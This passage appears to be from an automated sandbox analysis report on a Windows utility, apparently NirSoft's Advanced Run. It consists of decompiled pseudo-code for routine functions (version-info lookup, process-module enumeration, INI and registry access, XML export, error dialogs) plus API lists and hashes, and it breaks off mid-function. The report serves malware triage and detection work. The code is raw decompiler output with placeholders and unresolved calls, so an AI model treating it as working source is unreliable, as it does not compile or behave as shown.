                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                    • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                    • API String ID: 1832587304-479876776
                                                                                                                    • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                    • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                    • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                    • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                    0x0040afd3
                                                                                                                    0x0040afe2
                                                                                                                    0x0040aff3
                                                                                                                    0x0040b002
                                                                                                                    0x0040b023
                                                                                                                    0x00000000
                                                                                                                    0x0040b047
                                                                                                                    0x0040b02e
                                                                                                                    0x0040b034
                                                                                                                    0x0040b03c
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                    • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                    • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                    • wcscat.MSVCRT ref: 0040B002
                                                                                                                    • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                      • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                      • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                      • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                      • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                    • API String ID: 393120378-2245444037
                                                                                                                    • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                    • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                    • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                    • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                    • API String ID: 999028693-502967061
                                                                                                                    • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                    • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                    • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                    • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 38%
                                                                                                                    			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                    0x004092f3
                                                                                                                    0x004092fb
                                                                                                                    0x00409303
                                                                                                                    0x00409305
                                                                                                                    0x00409310
                                                                                                                    0x00409433
                                                                                                                    0x00409433
                                                                                                                    0x00409439
                                                                                                                    0x0040943f
                                                                                                                    0x00409445
                                                                                                                    0x0040944b
                                                                                                                    0x0040944e
                                                                                                                    0x00409452
                                                                                                                    0x00409466
                                                                                                                    0x0040946e
                                                                                                                    0x00409475
                                                                                                                    0x004094f7
                                                                                                                    0x004094f7
                                                                                                                    0x004094f9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409488
                                                                                                                    0x00409494
                                                                                                                    0x004094a5
                                                                                                                    0x004094a9
                                                                                                                    0x004094b5
                                                                                                                    0x004094c3
                                                                                                                    0x004094c6
                                                                                                                    0x004094d5
                                                                                                                    0x004094dc
                                                                                                                    0x004094e1
                                                                                                                    0x004094e3
                                                                                                                    0x004094f1
                                                                                                                    0x00000000
                                                                                                                    0x004094f1
                                                                                                                    0x00000000
                                                                                                                    0x004094e3
                                                                                                                    0x00000000
                                                                                                                    0x004094f7
                                                                                                                    0x00409452
                                                                                                                    0x00409316
                                                                                                                    0x00409316
                                                                                                                    0x0040931c
                                                                                                                    0x00000000
                                                                                                                    0x00409322
                                                                                                                    0x0040932b
                                                                                                                    0x00409333
                                                                                                                    0x00409337
                                                                                                                    0x00409341
                                                                                                                    0x00409342
                                                                                                                    0x0040934e
                                                                                                                    0x0040934f
                                                                                                                    0x00409358
                                                                                                                    0x0040935e
                                                                                                                    0x0040935e
                                                                                                                    0x00409363
                                                                                                                    0x0040936b
                                                                                                                    0x0040936d
                                                                                                                    0x00409377
                                                                                                                    0x00409385
                                                                                                                    0x0040938d
                                                                                                                    0x0040939d
                                                                                                                    0x004093a5
                                                                                                                    0x004093ac
                                                                                                                    0x004093b4
                                                                                                                    0x004093c5
                                                                                                                    0x004093c9
                                                                                                                    0x004093da
                                                                                                                    0x004093df
                                                                                                                    0x004093e5
                                                                                                                    0x004093e6
                                                                                                                    0x004093ea
                                                                                                                    0x004093f6
                                                                                                                    0x004093fc
                                                                                                                    0x00409407
                                                                                                                    0x00409407
                                                                                                                    0x0040941d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00409423
                                                                                                                    0x00409428
                                                                                                                    0x00409375
                                                                                                                    0x00409375
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040942e
                                                                                                                    0x00000000
                                                                                                                    0x00409428
                                                                                                                    0x00409377
                                                                                                                    0x0040936d
                                                                                                                    0x004094fb
                                                                                                                    0x004094ff
                                                                                                                    0x004094ff
                                                                                                                    0x00409337
                                                                                                                    0x0040931c
                                                                                                                    0x0040950f

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                    • memset.MSVCRT ref: 0040938D
                                                                                                                    • memset.MSVCRT ref: 0040939D
                                                                                                                      • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                    • memset.MSVCRT ref: 00409488
                                                                                                                    • wcscpy.MSVCRT ref: 004094A9
                                                                                                                    • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3300951397-0
                                                                                                                    • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                    • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                    • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                    • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                    0x00402ed7
                                                                                                                    0x00402eee
                                                                                                                    0x00402ef8
                                                                                                                    0x00402f00
                                                                                                                    0x00402f01
                                                                                                                    0x00402f05
                                                                                                                    0x00402f0a
                                                                                                                    0x00402f1a
                                                                                                                    0x00402f30

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 19018683-0
                                                                                                                    • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                    • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                    • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                    • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 50%
                                                                                                                    			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                    0x004079a4
                                                                                                                    0x004079b8
                                                                                                                    0x004079bd
                                                                                                                    0x004079c2
                                                                                                                    0x004079c5
                                                                                                                    0x004079c5
                                                                                                                    0x004079db
                                                                                                                    0x004079f7
                                                                                                                    0x00407a06
                                                                                                                    0x00407a0c
                                                                                                                    0x00407a11
                                                                                                                    0x00407a13
                                                                                                                    0x00407a14
                                                                                                                    0x00407a17
                                                                                                                    0x00407a18
                                                                                                                    0x00407a1d
                                                                                                                    0x00407a22
                                                                                                                    0x00407a25
                                                                                                                    0x00407a2a
                                                                                                                    0x00407a35
                                                                                                                    0x00407a3a
                                                                                                                    0x00407a3b
                                                                                                                    0x00407a40
                                                                                                                    0x00407a52

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004079DB
                                                                                                                      • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                      • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                      • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                    • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                    • API String ID: 1775345501-2769808009
                                                                                                                    • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                    • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                    • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                    • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                    0x00404683
                                                                                                                    0x00404692
                                                                                                                    0x00404699
                                                                                                                    0x0040469b
                                                                                                                    0x004046af
                                                                                                                    0x004046ba
                                                                                                                    0x004046bc
                                                                                                                    0x004046c7
                                                                                                                    0x004046cc
                                                                                                                    0x004046cd
                                                                                                                    0x004046ee
                                                                                                                    0x004046f3
                                                                                                                    0x004046fa
                                                                                                                    0x004046fa
                                                                                                                    0x004046ee
                                                                                                                    0x00404705

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004046AF
                                                                                                                    • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpen_snwprintfmemset
                                                                                                                    • String ID: %s\shell\%s
                                                                                                                    • API String ID: 1458959524-3196117466
                                                                                                                    • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                    • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                                    • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                                    • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                                    0x00409d5f
                                                                                                                    0x00409d67
                                                                                                                    0x00409d70
                                                                                                                    0x00409ddb
                                                                                                                    0x00409d72
                                                                                                                    0x00409d74
                                                                                                                    0x00409db2
                                                                                                                    0x00409d84
                                                                                                                    0x00409d84
                                                                                                                    0x00409d8c
                                                                                                                    0x00409d8d
                                                                                                                    0x00409d98
                                                                                                                    0x00409d9d
                                                                                                                    0x00409d9e
                                                                                                                    0x00409da6
                                                                                                                    0x00409daf
                                                                                                                    0x00409daf
                                                                                                                    0x00409dc3
                                                                                                                    0x00409dc3

                                                                                                                    APIs
                                                                                                                    • wcschr.MSVCRT ref: 00409D79
                                                                                                                    • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                    • String ID: "%s"
                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                    • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                    • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                    • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                    • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 38%
                                                                                                                    			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                                    0x004047d2
                                                                                                                    0x004047da
                                                                                                                    0x004047e0
                                                                                                                    0x004047e4
                                                                                                                    0x004047ec
                                                                                                                    0x004047ec
                                                                                                                    0x004047f5
                                                                                                                    0x00404800
                                                                                                                    0x00404801
                                                                                                                    0x00404802
                                                                                                                    0x0040480d
                                                                                                                    0x00404812
                                                                                                                    0x00404813
                                                                                                                    0x00404834

                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                    • _snwprintf.MSVCRT ref: 00404813
                                                                                                                    • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                    • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                    • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                    • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                    • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
